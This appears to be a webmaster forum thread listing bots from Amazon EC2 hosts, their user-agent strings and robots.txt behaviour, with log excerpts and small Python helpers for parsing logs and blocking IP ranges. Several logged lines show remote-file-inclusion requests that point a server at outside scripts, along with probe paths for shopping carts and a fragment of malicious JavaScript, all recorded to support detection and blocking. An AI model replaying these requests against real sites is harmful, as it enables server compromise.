- robots.txt? NO
- Uneven apostrophes in UA (only closing)
- site in UA yields this oh-so-descriptive info:
<html>
<head>
</head>
<body>
</body>
</html>
----- ----- ----- ----- -----
FWIW, bona fide amazonaws.com hosts spewed at least 33 bots on two of my sites in recent months. (Does someone get paid per bot or something?) Some bots may be new to some of you, or newly renamed. Here are the actual UA strings, in no particular order:
NetSeer/Nutch-0.9 (NetSeer Crawler; [netseer.com;...] crawler@netseer.com)
robots.txt? YES
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
[Note ru.]
robots.txt? NO
feedfinder/1.371 Python-urllib/1.16 +http://www.aaronsw.com/2002/feedfinder/
robots.txt? NO
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008022910 Viewzi/0.1
robots.txt? NO
Twitturly / v0.5
robots.txt? NO
YebolBot (compatible; Mozilla/5.0; MSIE 7.0; Windows NT 6.0; rv:1.8.1.11; mailTo:thunder.chang@gmail.com)
robots.txt? NO
YebolBot (Email: yebolbot@gmail.com; If the web crawling affects your web service, or you don't like to be crawled by us, please email us. We'll stop crawling immediately.)
[Whattaya think robots.txt is for, huh?]
robots.txt? YES ... Four times in 45 minutes
Attributor/Dejan-1.0-dev (Test crawler; [attributor.com;...] info at attributor com)
robots.txt? NO
PRCrawler/Nutch-0.9 (data mining development project)
robots.txt? YES
EnaBot/1.2 (http://www.enaball.com/crawler.html)
robots.txt? YES
Nokia6680/1.0 ((4.04.07) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 (botmobi find.mobi/bot.html) )
[Note spaced-out closing parens]
robots.txt? YES
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461) Java/1.5.0_09
robots.txt? NO
TheRarestParser/0.2a (http://therarestwords.com/)
robots.txt? NO
Mozilla/5.0 (compatible; D1GArabicEngine/1.0; crawlmaster@d1g.com)
robots.txt? NO
Clustera Crawler/Nutch-1.0-dev (Clustera Crawler; [crawler.clustera.com;...] cluster@clustera.com)
robots.txt? YES
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
robots.txt? YES
yacybot (i386 Linux 2.6.16-xenU; java 1.6.0_02; America/en) [yacy.net...]
robots.txt? NO
Mozilla/5.0
robots.txt? NO
Spock Crawler (http://www.spock.com/crawler)
robots.txt? YES
TinEye
robots.txt? NO
Teemer (NetSeer, Inc. is a Los Angeles based Internet startup company.; [netseer.com...] crawler@netseer.com)
robots.txt? YES
nnn/ttt (n)
robots.txt? YES
AideRSS/1.0 (aiderss.com)
robots.txt? NO
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
robots.txt? NO
----- ----- ----- ----- -----
These two UAs alternated multiple times one afternoon:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
robots.txt? NO
WebClient
robots.txt? YES
----- ----- ----- ----- -----
And finally, way too many offerings from "Paul," who's apparently unable to make up his mind, UA name-wise:
Mozilla/5.0 (compatible; page-store) [email:paul at page-store.com
robots.txt? NO
Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com)
robots.txt? YES
Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]
robots.txt? YES
Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
robots.txt? NO
zermelo Mozilla/5.0 compatible; heritrix/1.12.1 (+http://www.powerset.com) [email:crawl@powerset.com,email:paul@page-store.com]
robots.txt? YES
zermelo Mozilla/5.0 compatible; heritrix/1.12.1 (+http://www.powerset.com) [email:crawl@powerset.com,email:paul@page-store.com]
robots.txt? YES
Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
robots.txt? NO
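FWIW, several of the notes above flag UA strings that are structurally odd (spaced-out closing parens, a bracket that never closes). Here's a rough sketch of how those checks could be automated. The function name and the particular checks are my own assumptions, not anything the bots or any server software define:

```python
# Hypothetical helper: flag structural oddities in a User-Agent string.
PAIRS = {"(": ")", "[": "]"}

def ua_oddities(ua):
    """Return a list of short notes describing oddities found in `ua`."""
    notes = []
    if not ua.strip():
        notes.append("empty UA")
    for open_ch, close_ch in PAIRS.items():
        # Only compares counts; it does not verify nesting order.
        if ua.count(open_ch) != ua.count(close_ch):
            notes.append(f"unbalanced {open_ch}{close_ch}")
    if " )" in ua:
        notes.append("space before closing paren")
    return notes

if __name__ == "__main__":
    for ua in (
        "Mozilla/5.0 (compatible; page-store) [email:paul at page-store.com",
        "TinEye",
    ):
        print(ua_oddities(ua), ua)
```

An oddity is only a hint, of course. Plenty of legitimate clients send sloppy UAs, so I'd log on these rather than block on them.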
-----
Slippery little suckers indeed. Thank goodness I block amazonaws.com no matter what.
DAILY (multiple times; always HEAD requests):
ec2-75-101-197-164.compute-1.amazonaws.com
PycURL/7.18.2
ec2-174-129-141-109.compute-1.amazonaws.com
PostRank/2.0 (postrank.com)
WEEKLY (approx.; always HEAD requests):
ec2-174-129-91-231.compute-1.amazonaws.com
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)
(Two days earlier, Netcraft sent its minion...)
lager.netcraft.com
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)
I already block every AWS range known to me and log the hits, including 67.202.0.0 - 67.202.127.255. It's when the hits cloud other logged issues that I react violently. :)
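For anyone who keeps ranges as first/last pairs like the one above, here's a minimal sketch of collapsing them to CIDR form and testing an address against them, using Python's standard ipaddress module. The RANGES list and the function names are just for illustration; only the 67.202 range comes from this post:

```python
import ipaddress

# First/last pairs as quoted in this thread; add your own as needed.
RANGES = [
    ("67.202.0.0", "67.202.127.255"),
]

def range_to_cidrs(first, last):
    """Collapse an inclusive first-last IPv4 range into CIDR networks."""
    return list(ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last)))

BLOCKED = [net for first, last in RANGES for net in range_to_cidrs(first, last)]

def is_blocked(ip):
    """True if `ip` falls inside any of the collapsed networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BLOCKED)

if __name__ == "__main__":
    print([str(net) for net in BLOCKED])
    print(is_blocked("67.202.25.2"))
```

The CIDR form is handy because most server deny rules and firewalls accept it directly.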
[18:52:16 2009] [client 174.129.89.199] client denied by server configuration: (file path)
[18:52:24 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:25 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:28 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:38 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:52:41 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:53:17 2009] [client 174.129.175.212] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:54:09 2009] [client 174.129.175.212] client denied by server configuration: (file path)
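When denied hits pile up like this, a quick tally per client makes the noise easier to see. This is only a sketch: it assumes lines shaped like the abbreviated excerpt above (real error logs carry more fields, and newer Apache versions append a port to the client address, which this pattern does not handle). The names are mine:

```python
import re
from collections import Counter

# Matches the "[client a.b.c.d] client denied ..." portion of an error-log line.
CLIENT_RE = re.compile(
    r"\[client (\d{1,3}(?:\.\d{1,3}){3})\] client denied by server configuration"
)

def count_denied(lines):
    """Count 'client denied' entries per client IP."""
    counts = Counter()
    for line in lines:
        m = CLIENT_RE.search(line)
        if m:
            counts[m.group(1)] += 1
    return counts

SAMPLE = """\
[18:52:16 2009] [client 174.129.89.199] client denied by server configuration: (file path)
[18:52:24 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:25 2009] [client 174.129.193.100] client denied by server configuration: (file path)
"""

if __name__ == "__main__":
    for ip, hits in count_denied(SAMPLE.splitlines()).most_common():
        print(ip, hits)
```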
That range, that place, gives irresponsible bot-runners a place to hide and breed.
ec2-67-202-25-2.compute-1.amazonaws.com
Toata dragostea mea pentru diavola
11/22 07:59:29 /1.1
11/22 07:59:29 /install.txt
11/22 07:59:29 /
11/22 07:59:30 /cart/
11/22 07:59:30 /zencart/
11/22 07:59:30 /zen-cart/
11/22 07:59:30 /zen/
11/22 07:59:30 /shop/
Here's info [webmasterworld.com] about the primary 'toata' UA. (There are variations.) As a Romanian-speaking pal of GaryK's translated here [webmasterworld.com], it means: "I love the devil."
ec2-67-202-60-246.compute-1.amazonaws.com
Jakarta Commons-HttpClient/3.0
//scriptdocument.write(unescape( [remainder of malicious javascript snipped]
At least AWS has recommendations/info [aws.amazon.com] for reporting abuse. Wonder if bad bots qualify as report-worthy, too? ;)
---
P.S./FYI
The following hosts/UAs just requested the exact same 'file' -- the URIs match even down to the exact same clientid and site referenced -- within the same 20-minute period. Googlebot, which was the only one to request robots.txt, was also the only one to attempt the hit twice (1 min. apart):
icerocket.com
BlogSearch/1.0 +http://www.icerocket.com/
87.218.210-nn.q9.net
Java/1.6.0_14
crawl-66-249-71-107.googlebot.com
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
64.94.67.nnn
Moreoverbot/5.00 (+http://www.moreover.com; webmaster@moreover.com)
Who's crawling/exploiting whom?
ec2-75-101-196-241.compute-1.amazonaws.com
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (MrTweet/1.0)
robots.txt? NO
...an AWS IP in the midst of botnet accesses.
174.129.117.129 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 940 "-" "-"
75.101.169.108 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 946 "-" "-"
67.202.31.110 - - [19/Dec/2009:08:13:27 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:28 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 945 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:39 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.2.96 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 936 "-" "-"
75.101.213.151 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"
174.129.107.93 - - [19/Dec/2009:08:13:41 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"
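To spot this kind of pattern (many IPs, same target, blank UA) without eyeballing the log, something like the following could work. It's a sketch that assumes combined-format access-log lines like the ones above; the regex and function names are my own:

```python
import re
from collections import defaultdict

# Combined log format: ip ident user [time] "method target proto" status size "referer" "ua"
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def parse(line):
    """Return the fields of one access-log line as a dict, or None if it doesn't match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def ips_by_target(lines):
    """Map each requested target to the set of client IPs that asked for it."""
    seen = defaultdict(set)
    for line in lines:
        hit = parse(line)
        if hit:
            seen[hit["target"]].add(hit["ip"])
    return seen

SAMPLE = """\
67.202.31.110 - - [19/Dec/2009:08:13:27 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:28 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 945 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:39 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
"""

if __name__ == "__main__":
    for target, ips in ips_by_target(SAMPLE.splitlines()).items():
        print(target, sorted(ips))
```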
.
Mozilla/5.0
22:36:04///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?
ec2-204-236-129-29.us-west-1.compute.amazonaws.com
Mozilla/5.0
22:36:07///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?
Notes:
- The first hit's dot-as-host IP turned out to be 99.198.118.18*, a Chicago-based server farm. Search results show the same IP and exploit hitting elsewhere.
- The intra-URI exploit domain obfuscated in both hits as 'example.com' has approx. 2,150 search results. Its page title? "Verified by Visa" (and content includes "Start by entering your Visa card below...").
- If you're blocking on amazonaws.com subdomain formats, the second hit is slightly different. Typically, they're --
IP.compute-1(or2,etc).amazonaws.com
-- but this is:
IP.us-west-1.compute.amazonaws.com
There are more variations here [robtex.com]. (I block on amazonaws.com)
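Since the subdomain formats vary, matching on the amazonaws.com suffix sidesteps the problem. A small sketch of that check, plus pulling the dotted IP back out of the ec2- prefix (function names are hypothetical; the hostnames are ones quoted in this thread):

```python
import re

# The ec2-a-b-c-d prefix that leads the hostnames quoted in this thread.
EC2_PREFIX_RE = re.compile(r"^ec2-(\d{1,3})-(\d{1,3})-(\d{1,3})-(\d{1,3})\.")

def is_aws_host(hostname):
    """True if the hostname is amazonaws.com or any subdomain of it."""
    host = hostname.strip().rstrip(".").lower()
    return host == "amazonaws.com" or host.endswith(".amazonaws.com")

def embedded_ip(hostname):
    """Return the dotted IP encoded in an ec2-a-b-c-d hostname, or None."""
    m = EC2_PREFIX_RE.match(hostname.strip().lower())
    return ".".join(m.groups()) if m else None

if __name__ == "__main__":
    for host in (
        "ec2-75-101-197-164.compute-1.amazonaws.com",
        "ec2-204-236-129-29.us-west-1.compute.amazonaws.com",
        "lager.netcraft.com",
    ):
        print(host, is_aws_host(host), embedded_ip(host))
```

Note the leading dot in the suffix test, so a lookalike such as notamazonaws.com doesn't match. Reverse DNS is set by whoever controls the IP, so a hostname alone isn't proof of origin either way.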
ec2-75-101-138-216.compute-1.amazonaws.com
Mozilla/5.0
10:47:33 //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.example.su//assets/images/mawar.txt?
Note: .su is the country-code TLD assigned to the former Soviet Union.
(FWIW, I won't keep posting exploit events because this thread's for spider sightings and the fake UA has been reported.)
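Both the plain and the percent-encoded forms of this exploit can be caught with one check if the URI is decoded first. A minimal sketch, assuming you only care about the _SERVER[DOCUMENT_ROOT] variant seen here (the pattern and function name are mine, and it decodes only once, so double-encoded attempts would slip past):

```python
import re
from urllib.parse import unquote

# Remote-file-inclusion attempts of the form _SERVER[DOCUMENT_ROOT]=http://...
RFI_RE = re.compile(r"_SERVER\[DOCUMENT_ROOT\]=(?:https?|ftp)://", re.IGNORECASE)

def looks_like_rfi(request_uri):
    """True if the (percent-decoded) request URI carries the inclusion pattern."""
    decoded = unquote(request_uri)
    return bool(RFI_RE.search(decoded))

if __name__ == "__main__":
    for uri in (
        "//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.example.su//assets/images/mawar.txt?",
        "/favicon.ico",
    ):
        print(looks_like_rfi(uri), uri)
```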
IP: 204.236.128.0 - 204.236.255.255
UA: Chen Li/Nutch-1.0 (Nutch spiderman; [chenli....] com. cn; chenlibiti @163. com)
Robots: No idea.
Amazon.com, Inc.
OrgID: AMAZO-4
Address: Amazon Web Services, Elastic Compute Cloud, EC2
FWIW, here's yet another UA:
ec2-174-129-141-135.compute-1.amazonaws.com
Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
robots.txt? NO